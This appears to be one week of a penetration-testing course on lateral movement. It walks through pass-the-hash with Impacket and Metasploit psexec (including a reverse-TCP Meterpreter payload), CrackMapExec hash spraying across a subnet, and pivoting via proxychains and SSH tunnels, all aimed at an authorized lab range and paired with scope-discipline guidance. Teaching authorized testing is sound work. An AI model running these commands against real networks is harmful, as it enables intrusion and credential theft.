The initial compromised host is a beachhead. Lateral movement is the process of using it to reach other systems inside the authorized network. This week covers credential reuse, pass-the-hash, network pivoting, and -- critically -- the operational security discipline that keeps the engagement within its authorized scope.
Reading (~1.5 hr)
Required:
- Weidman, Penetration Testing, Chapter 13 ("Post Exploitation"), sections on lateral movement (PSExec, pass-the-hash, token impersonation, pivoting). ~15 pages.
- HP3, Chapter 4 ("The Drive -- Compromising the Network"), the lateral movement and pivoting subsections (Responder, CrackMapExec, BloodHound/SharpHound, pass-the-hash, lateral movement via RDP). HP3 covers the red-team versions of the same techniques; the authorized-engagement constraint is identical.
Supplementary:
- Seitz + Arnold, Black Hat Python, Chapter 9 (network tooling with scapy; foundational for understanding what pass-the-hash is doing at the packet level).
- PTES, Post-Exploitation section (pentest-standard.org/Post_Exploitation), the lateral movement and pivoting subsections.
Lecture outline (~1 hr)
Part 1: Credential reuse and pass-the-hash (25 min)
The most reliable lateral movement technique is the simplest: using credentials that work on one system to authenticate to another. Credentials come from the post-exploitation phase in several forms.
Credential forms and their reuse vectors:
| Credential type | Where found | Reuse vector |
|---|---|---|
| Plaintext password | .bash_history, config files, LSASS (WDigest, only where caching is still enabled), memory | Password spray, SSH, WinRM, RDP, SMB login |
| NTLM hash | SAM database dump, LSASS memory via Mimikatz | Pass-the-hash (SMB, WinRM, WMI: any service that authenticates with NTLM accepts the hash directly) |
| Kerberos ticket | LSASS memory via sekurlsa::tickets or Rubeus | Pass-the-ticket (Kerberos service ticket or TGT reuse) |
| SSH private key | ~/.ssh/id_rsa; authorized_keys gives you a target list | SSH connection to any host that has the matching public key registered |
Pass-the-hash (PTH):
NTLM authentication is a challenge-response keyed by the NT hash, not by the password: the client proves it can compute a response from MD4(UTF-16LE(password)), and the plaintext is never needed on either side. Anything that can compute that response from the hash can authenticate, which is exactly what Impacket's psexec.py does when handed the hash directly:
# Pass-the-hash with Impacket psexec. -hashes takes LMHASH:NTHASH; the leading
# colon leaves the LM half empty (hosts with LM hashing disabled, the default since Vista, store none).
python3 /usr/share/doc/python3-impacket/examples/psexec.py \
-hashes :<NTLM_hash> \
Administrator@192.168.100.30
The hash was extracted from host A (Week 9, load kiwi; creds_all). It works on host B because the same local Administrator account with the same password hash exists on both hosts -- a common misconfiguration called "password reuse across local admin accounts." Note that no cracking is involved: the hash is the credential.
From a Meterpreter session, Metasploit's psexec module does the same. Metasploit expects SMBPass in LMHASH:NTHASH form, so prepend the empty-LM constant to the NT hash:
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.100.30
msf6 > set SMBUser Administrator
msf6 > set SMBPass aad3b435b51404eeaad3b435b51404ee:<NTLM_hash>
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > run
CrackMapExec for credential spraying:
CrackMapExec (crackmapexec or cme on Kali) tests one credential set against every host in a range:
# Test a credential set across the subnet:
crackmapexec smb 192.168.100.0/24 -u Administrator -H <NTLM_hash>
# Add --local-auth when Administrator is a local account on domain-joined hosts;
# without it CME tries the logon as a domain account.
# Hosts that show (Pwn3d!) accepted the credential with local admin rights;
# a plain [+] means the logon worked but the account is not an admin there.
This is a targeted test against the authorized lab range only. On a real engagement, spraying an NTLM hash across the hosts you are authorized to test is permitted; spraying across IP ranges not in the ROE is not, and the range argument on that command line is exactly where the mistake gets made.
Part 2: Pivoting -- using host A to reach host B (20 min)
Pivoting uses a compromised host as a relay to reach network segments the attacker cannot reach directly. In the lab, the scenario is: Kali can reach the DMZ network (192.168.100.0/24), one DMZ host has been compromised, and that host has a second network interface on the internal LAN (10.0.0.0/24) that Kali cannot route to directly.
Adding a route in Metasploit:
# From a Meterpreter session on the pivot host:
meterpreter > run post/multi/manage/autoroute
# or:
meterpreter > background
msf6 > route add 10.0.0.0/24 <session-id>
# Now Metasploit modules routed through the pivot:
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.0.0.0/24
msf6 > run
Socks proxy with proxychains:
For tools outside Metasploit, use a SOCKS proxy that forwards through the pivot session:
# In Metasploit, start a socks proxy (the route added above must already exist):
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > run -j
# Point /etc/proxychains4.conf at it (socks5 127.0.0.1 1080), then route any tool through the proxy.
# proxychains only carries TCP connections, so disable nmap's ICMP host discovery (-Pn)
# and use a connect scan (-sT); SYN scans and ping sweeps never reach the proxy.
proxychains nmap -sT -Pn -p 22,80,443,3389 10.0.0.10
proxychains python3 psexec.py Administrator@10.0.0.10
SSH port forwarding (when the pivot has SSH access):
# Local forward: listen on Kali:local_port, forward to 10.0.0.10:80 via the pivot:
ssh -L 8888:10.0.0.10:80 user@192.168.100.20
# Now: curl http://127.0.0.1:8888 reaches 10.0.0.10:80 through the SSH tunnel
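What proxychains and Metasploit's socks_proxy actually exchange in the SOCKS section above, as an added example (not code from the page, Metasploit or proxychains): a client-side SOCKS5 CONNECT handshake, a single-connection SOCKS5 proxy standing in for the pivot, and an echo listener standing in for the internal host, all on loopback so it runs offline. Function names, the dynamic ports and the echo payload are this example's own.

```python
import socket
import struct
import threading


def build_socks5_connect(host: str, port: int) -> bytes:
    """RFC 1928 CONNECT request: VER=5 CMD=1 RSV=0 ATYP=1 (IPv4) DST.ADDR DST.PORT.
    Note what is absent: no TCP flags, TTL or raw packet fields. The proxy can only
    open a full TCP connection on the client's behalf."""
    return b"\x05\x01\x00\x01" + socket.inet_aton(host) + struct.pack(">H", port)


def parse_socks5_connect(req: bytes):
    """Proxy side: decode a CONNECT request into (host, port)."""
    ver, cmd, _rsv, atyp = req[0], req[1], req[2], req[3]
    if ver != 5 or cmd != 1 or atyp != 1:
        raise ValueError("only SOCKS5 CONNECT to an IPv4 address is handled here")
    return socket.inet_ntoa(req[4:8]), struct.unpack(">H", req[8:10])[0]


def socks5_connect(sock: socket.socket, host: str, port: int) -> None:
    """Client side, i.e. what proxychains does inside the connect() it hooks."""
    sock.sendall(b"\x05\x01\x00")                 # greeting: one method offered, 0x00 = no auth
    if sock.recv(2) != b"\x05\x00":
        raise ConnectionError("proxy refused the no-auth method")
    sock.sendall(build_socks5_connect(host, port))
    reply = sock.recv(10)                         # VER REP RSV ATYP BND.ADDR(4) BND.PORT(2)
    if len(reply) < 2 or reply[1] != 0x00:
        raise ConnectionError("CONNECT refused by proxy")


def _relay(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until EOF, then tear down both sides."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass


def start_pivot_proxy(connect_log: list) -> int:
    """Single-connection SOCKS5 proxy on 127.0.0.1 (stands in for socks_proxy on the pivot)."""
    srv = socket.socket()
    srv.settimeout(5)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.settimeout(5)
        hdr = conn.recv(2)                        # VER NMETHODS
        conn.recv(hdr[1])                         # the offered method list
        conn.sendall(b"\x05\x00")                 # choose no-auth
        host, port = parse_socks5_connect(conn.recv(10))
        connect_log.append((host, port))          # the pivot's record of what it connected to
        target = socket.create_connection((host, port), timeout=5)
        conn.sendall(b"\x05\x00\x00\x01" + socket.inet_aton("0.0.0.0") + b"\x00\x00")
        threading.Thread(target=_relay, args=(conn, target), daemon=True).start()
        _relay(target, conn)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def start_echo_server() -> int:
    """Stands in for the internal host (10.0.0.10 in the lecture) Kali cannot route to."""
    srv = socket.socket()
    srv.settimeout(5)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.sendall(conn.recv(4096))
        conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Reach the 'internal' echo host through the pivot proxy; returns (reply, proxy log)."""
    log = []
    echo_port = start_echo_server()
    proxy_port = start_pivot_proxy(log)
    with socket.create_connection(("127.0.0.1", proxy_port), timeout=5) as s:
        socks5_connect(s, "127.0.0.1", echo_port)   # constructed target; real use: 10.0.0.10
        s.sendall(b"hello via pivot")
        answer = s.recv(4096)
    return answer, log
```

The request the proxy sees is a destination address and port and nothing else, and it answers by opening an ordinary TCP connection from the pivot. That is why connect()-based tools (nmap -sT, psexec.py, curl) traverse the tunnel and raw-socket or ICMP tools never do.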
Part 3: Scope discipline during lateral movement (15 min)
Lateral movement is the phase where scope violations are most likely. The momentum of finding credential reuse across many hosts can carry you past the authorized IP range. This is the point at which the ROE is most load-bearing.
Scope discipline practices:
- Before every new connection attempt, ask: is this IP in the authorized range? The answer must be yes before you proceed.
- If the pivot host has network interfaces you did not know about (enumerated by route or ipconfig), verify with the client or instructor whether those segments are in scope before probing them.
- Maintain a running kill-chain map during the engagement. Each new host you reach should be logged: how you reached it, what credential you used, what you found. This map is the engagement transcript Lab 10 requires.
- If you accidentally connect to a host outside scope: stop, document the timestamp, the IP, and the exact command that caused the connection, and notify the instructor immediately.
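The scope discipline list above, and the kill-chain map Lab 10 Phase 5 asks for, turned into a small tool. This is an added example and not part of the course materials: every hop is checked against the ROE ranges before it is recorded, a refused hop is logged with the timestamp, IP and exact command the last bullet requires, and the successful hops render in the lab's text diagram format. The class and function names, the commands and the out-of-scope address are this example's own; the CIDRs are the lecture's lab ranges.

```python
import ipaddress
from datetime import datetime, timezone


class ScopeViolation(Exception):
    """Raised when a connection would leave the authorized range."""


class Engagement:
    """Scope gate plus running kill-chain map for one engagement.

    authorized_cidrs comes from the ROE. Every hop is checked against it before
    the connection is attempted; refused attempts are recorded with what the
    escalation rule needs (time, IP, exact command).
    """

    def __init__(self, authorized_cidrs):
        self.scope = [ipaddress.ip_network(c) for c in authorized_cidrs]
        self.hops = []        # (source, technique, destination) per successful hop
        self.incidents = []   # refused, out-of-scope connection attempts

    def in_scope(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.scope)

    def gate(self, ip: str, command: str) -> None:
        """Call before every new connection attempt; refuses and records out-of-scope targets."""
        if not self.in_scope(ip):
            self.incidents.append({
                "time": datetime.now(timezone.utc).isoformat(timespec="seconds"),
                "ip": ip,
                "command": command,
                "action": "stopped; notify instructor / client contact",
            })
            raise ScopeViolation(f"{ip} is not in the authorized range")

    def hop(self, src: str, technique: str, dst_ip: str, dst_name: str,
            privilege: str, command: str) -> None:
        """Record one lateral-movement hop, refusing it if the target is out of scope."""
        self.gate(dst_ip, command)
        self.hops.append((src, technique, f"{dst_name} ({dst_ip}, {privilege})"))

    def render(self) -> str:
        """Kill-chain diagram in the text format Lab 10 Phase 5 asks for."""
        return "\n".join(f"{src} → [{tech}] → {dst}" for src, tech, dst in self.hops)


def demo() -> Engagement:
    """Replays the lab's two hops, then a constructed out-of-scope attempt that the gate refuses."""
    eng = Engagement(["192.168.100.0/24", "10.0.0.0/24"])   # ROE: DMZ plus internal LAN
    eng.hop("Kali (attacker)", "vsftpd exploit", "192.168.100.20", "Host A", "root",
            "msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run")
    eng.hop("Host A", "NTLM hash reuse via psexec.py", "192.168.100.30", "Host B", "SYSTEM",
            "psexec.py -hashes :<NTLM_hash> Administrator@192.168.100.30")
    # Host B turns out to have a third interface into 172.16.0.0/12, which the ROE does not list.
    try:
        eng.hop("Host B", "credential reuse", "172.16.0.10", "unknown host", "?",
                "proxychains python3 psexec.py Administrator@172.16.0.10")
    except ScopeViolation:
        pass                                      # refused; eng.incidents holds the record
    return eng
```

Run demo() and print eng.render() for the diagram and eng.incidents for the escalation record. The habit the tool enforces is the one the bullets describe: the IP is checked before the command runs, not after the shell comes back.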
Lab 10: Lateral Movement and Multi-Host Engagement Transcript (~5 hr, graded)
See labs/lab-10-lateral-movement.md for the full lab.
Target: Instructor-provided multi-host lab network. The range includes Metasploitable 2 + a second host (Windows or Linux) with credential reuse from the first. Both are in the authorized range.
Authorization note: The authorized range is the lab network only. If you encounter IPs outside the stated range during pivoting or credential reuse, stop and notify the instructor.
Lab phases:
Phase 1: Establish foothold on Host A (Metasploitable 2)
Use any technique from Weeks 7-9. Document the foothold as: method, initial privilege level, and the key post-exploitation information gathered (running processes, network interfaces, credentials extracted).
Phase 2: Enumerate Host B from Host A
From the compromised session on Host A, enumerate Host B:
- What IP is Host B?
- What ports are open on Host B? (Port scan via proxychains or Metasploit route)
- Does Host B share any credential material with Host A?
Phase 3: Lateral movement to Host B
Use credentials extracted from Host A to authenticate to Host B. Document: the credential type (plaintext, NTLM hash, SSH key), the tool used, and the resulting shell privilege level.
Phase 4: Post-exploitation on Host B
Run LinPEAS or WinPEAS on Host B. What would the next escalation step be? (You do not need to execute it -- documenting the path is sufficient.)
Phase 5: Document the kill chain
Produce a kill-chain diagram in text format:
Kali (attacker) → [vsftpd exploit] → Host A (192.168.100.20, root)
Host A → [NTLM hash reuse via psexec.py] → Host B (192.168.100.30, SYSTEM)
Host B → [WinPEAS: unquoted service path] → SYSTEM (already at SYSTEM)
Deliverable: The engagement transcript (kill-chain diagram + per-host notes) and a one-page analysis: what credential reuse paths did you find, what network segments did you discover, and what is the business impact of this level of lateral movement in client terms?
Independent practice (~3 hr)
- Impacket exploration (1.5 hr): Explore the Impacket suite beyond psexec. The suite includes tools for SMB relay attacks (ntlmrelayx.py), Kerberos ticket manipulation (getTGT.py), and SMB share enumeration (smbclient.py). Read the help output of three tools you did not use in Lab 10:
ls /usr/share/doc/python3-impacket/examples/
- Active Directory primer (1 hr): HP3 Chapter 4 covers Active Directory attack chains (BloodHound, Kerberoasting, DCSync). For PEN-101, this is exposure-level material; ADV-101 goes deeper. Read the BloodHound/SharpHound section and the Kerberoasting section for vocabulary. What is a service principal name (SPN) and why does it matter for Kerberoasting?
- Reflection (0.5 hr): Write responses to the reflection prompts below.
Reflection prompts
- The lab demonstrated credential reuse: the same local Administrator NTLM hash worked on both Host A and Host B. This is a misconfiguration at the organizational level, not a vulnerability in any specific software. How would you write this as a finding in the engagement report? What is the remediation, specifically -- what change does the client need to make?
- You used proxychains to route nmap through the pivot. The nmap scan was a TCP Connect scan (-sT), not a SYN scan (-sS). Why does TCP Connect scan work through a SOCKS proxy when SYN scan does not? What does this imply about what an attacker can and cannot do through a proxied connection?
- During lateral movement, you discovered that Host B has a third network interface connected to a 172.16.0.0/12 segment that is not in the ROE. The segment appears to contain the client's production database servers. What do you do? Write the sentence you would send to the client contact in the escalation communication described in the ROE.
Toolchain Diary: Week 10 additions
- Impacket (psexec.py, smbclient.py, secretsdump.py) -- Python network-protocol library for Windows authentication protocols. secretsdump.py dumps NTLM hashes remotely from the SAM or NTDS.dit without requiring a Meterpreter session. Source: github.com/fortra/impacket.
- CrackMapExec (cme) -- Multi-protocol post-exploitation Swiss army knife. Tests credentials across a range; runs commands; dumps SAM. crackmapexec --help for the full option tree.
- proxychains -- Routes TCP traffic from any tool through a SOCKS or HTTP proxy. Config at /etc/proxychains4.conf; set the socks5 proxy line to match Metasploit's socks proxy port.
- Metasploit route/autoroute -- Adds network routes through Meterpreter sessions so Metasploit modules can reach non-routable network segments.
What's next
Week 11 is reporting. Active testing is over. The engagement findings from Weeks 7-10 are the raw material; Week 11 teaches you to turn them into a document a client will pay for and act on.